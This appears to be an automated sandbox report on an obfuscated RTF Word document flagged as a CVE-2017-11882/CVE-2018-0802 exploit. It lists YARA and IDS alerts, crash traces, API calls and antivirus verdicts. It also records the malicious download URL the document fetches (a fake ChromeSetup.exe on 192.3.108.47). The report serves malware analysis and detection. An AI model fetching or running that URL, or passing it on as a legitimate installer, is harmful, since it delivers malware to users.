Summary | ZeroBOX

IOI0ioio0OIOIO0IOI0ioi0i0000000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300000000.doc

MS_RTF_Obfuscation_Objects doc RTF File
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 30, 2023, 1:23 p.m. Sept. 30, 2023, 1:29 p.m.
Size 29.5KB
Type ISO-8859 text, with very long lines, with CRLF, CR, LF line terminators
MD5 750637aa4adce8ce221b8d8755dbbaf8
SHA256 2e850540fca520336d35447b1592d9d4ee27b139c83ffec3b12bc6d31fdc4f2f
CRC32 16C3918E
ssdeep 384:dEhzWuGu5+nEEKFBe4FGa27Y6QJI8dvDhQfCecbYryaUHuEz:w6pEEKFQoYY6MIOSfTKHaoz
Yara
  • SUSP_INDICATOR_RTF_MalVer_Objects - Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.
  • Rich_Text_Format_Zero - Rich Text Format Signature Zero
  • MS_RTF_Suspicious_documents - Suspicious documents using RTF document OLE object

IP Address Status Action
142.250.204.109 Active Moloch
142.250.204.110 Active Moloch
142.250.204.67 Active Moloch
142.250.206.238 Active Moloch
142.250.66.132 Active Moloch
142.250.66.67 Active Moloch
142.250.76.131 Active Moloch
142.251.220.1 Active Moloch
142.251.220.3 Active Moloch
142.251.222.195 Active Moloch
164.124.101.2 Active Moloch
172.217.161.225 Active Moloch
172.217.161.234 Active Moloch
172.217.25.170 Active Moloch
172.217.25.174 Active Moloch
192.3.108.47 Active Moloch
211.114.64.12 Active Moloch
216.58.200.228 Active Moloch
34.104.35.123 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49162 -> 192.3.108.47:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.3.108.47:80 -> 192.168.56.103:49162 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.3.108.47:80 -> 192.168.56.103:49162 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.3.108.47:80 -> 192.168.56.103:49162 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 192.3.108.47:80 -> 192.168.56.103:49162 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 142.250.66.67:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.104.35.123:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 34.104.35.123:80 -> 192.168.56.103:49172 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49167 -> 142.250.66.67:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49199 -> 8.8.8.8:443 2047866 ET INFO Observed Google DNS over HTTPS Domain (dns .google in TLS SNI) Misc activity
TCP 192.168.56.103:49195 -> 142.250.66.67:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.103:49168
142.250.66.67:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49
TLS 1.2
192.168.56.103:49167
142.250.66.67:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49
TLS 1.3
192.168.56.103:49184
142.250.204.67:443
None None None
TLS 1.3
192.168.56.103:49183
142.250.66.132:443
None None None
TLS 1.3
192.168.56.103:49187
172.217.25.14:443
None None None
TLS 1.3
192.168.56.103:49186
142.251.222.195:443
None None None
TLS 1.3
192.168.56.103:49188
216.58.200.228:443
None None None
TLS 1.3
192.168.56.103:49189
211.114.64.12:443
None None None
TLS 1.3
192.168.56.103:49192
142.251.220.3:443
None None None
TLS 1.3
192.168.56.103:49199
8.8.8.8:443
None None None
TLS 1.3
192.168.56.103:49197
8.8.8.8:443
None None None
TLS 1.3
192.168.56.103:49200
172.217.25.170:443
None None None
TLS 1.3
192.168.56.103:49201
172.217.25.170:443
None None None
TLS 1.3
192.168.56.103:49194
142.250.204.110:443
None None None
TLS 1.3
192.168.56.103:49202
142.250.206.238:443
None None None
TLS 1.2
192.168.56.103:49195
142.250.66.67:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49
TLS 1.3
192.168.56.103:49203
172.217.25.174:443
None None None
TLS 1.3
192.168.56.103:49206
142.250.76.131:443
None None None
TLS 1.3
192.168.56.103:49185
142.250.204.109:443
None None None
TLS 1.3
192.168.56.103:49196
142.251.220.1:443
None None None
TLS 1.3
192.168.56.103:49198
8.8.8.8:443
None None None
TLS 1.3
192.168.56.103:49204
172.217.161.234:443
None None None
UNDETERMINED
192.168.56.103:49191
142.251.220.3:443
None None None
UNDETERMINED
192.168.56.103:49190
142.251.220.3:443
None None None

Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1622000
registers.edi: 1974991376
registers.eax: 1622000
registers.ebp: 1622080
registers.edx: 0
registers.ebx: 75475404
registers.esi: 2147944126
registers.ecx: 2846981211
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1621692
registers.edi: 1974991376
registers.eax: 1621692
registers.ebp: 1621772
registers.edx: 0
registers.ebx: 75529548
registers.esi: 2147944122
registers.ecx: 2846981211
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://192.3.108.47/test/ChromeSetup.exe
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=11:7Gz5hy99G0OJGwmw-g8p-blMoWYIGYN02Dr48kg3q48&cup2hreq=7a6509b0222169109f7b96e446becc365cb6859e88bdecbd3f898226ad48db9e
request GET http://192.3.108.47/test/ChromeSetup.exe
request HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome/czao2hrvpk5wgqrkz4kks5r734_109.0.5414.120/109.0.5414.120_chrome_installer.exe
request GET http://edgedl.me.gvt1.com/edgedl/release2/chrome/czao2hrvpk5wgqrkz4kks5r734_109.0.5414.120/109.0.5414.120_chrome_installer.exe
request HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhemejginpboagddgdfbepgmp_414_all_ZZ_acz2kiivwz66gcmd564fvjnnf4sa.crx3
request GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhemejginpboagddgdfbepgmp_414_all_ZZ_acz2kiivwz66gcmd564fvjnnf4sa.crx3
request POST https://update.googleapis.com/service/update2
request POST https://update.googleapis.com/service/update2?cup2key=11:7Gz5hy99G0OJGwmw-g8p-blMoWYIGYN02Dr48kg3q48&cup2hreq=7a6509b0222169109f7b96e446becc365cb6859e88bdecbd3f898226ad48db9e
request POST https://update.googleapis.com/service/update2
request POST https://update.googleapis.com/service/update2?cup2key=11:7Gz5hy99G0OJGwmw-g8p-blMoWYIGYN02Dr48kg3q48&cup2hreq=7a6509b0222169109f7b96e446becc365cb6859e88bdecbd3f898226ad48db9e
Application Crash Process WINWORD.EXE with pid 1836 crashed
file C:\Users\test22\AppData\Local\Temp\~$I0ioio0OIOIO0IOI0ioi0i0000000##############000000000000000000##############00000000.doc
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000484
filepath: C:\Users\test22\AppData\Local\Temp\~$I0ioio0OIOIO0IOI0ioi0i0000000##############000000000000000000##############00000000.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$I0ioio0OIOIO0IOI0ioi0i0000000##############000000000000000000##############00000000.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
host 142.250.206.238
host 142.250.66.67
host 142.250.76.131
host 142.251.222.195
host 172.217.161.225
host 172.217.161.234
host 172.217.25.170
host 172.217.25.174
host 192.3.108.47
CAT-QuickHeal Exp.RTF.Obfus.Gen
ALYac Exploit.RTF-ObfsObjDat.Gen
Sangfor Malware.Generic-RTF.Save.4aa2c45b
Symantec Exp.CVE-2017-11882!g5
ESET-NOD32 multiple detections
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.CVE-2018-0798.4
VIPRE Exploit.RTF-ObfsObjDat.Gen
TrendMicro HEUR_RTFMALFORM
FireEye Exploit.RTF-ObfsObjDat.Gen
GData Exploit.RTF-ObfsObjDat.Gen
Avira HEUR/Rtf.Malformed
Arcabit Exploit.RTF-ObfsObjDat.Gen
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft Trojan:Script/Wacatac.H!ml
Google Detected
AhnLab-V3 RTF/Malform-A.Gen
McAfee RTFObfustream.c!750637AA4ADC
MAX malware (ai score=84)
Zoner Probably Heur.RTFBadHeader
Ikarus Exploit.CVE-2017-11882
Fortinet MSOffice/CVE_2018_0798.BOR!exploit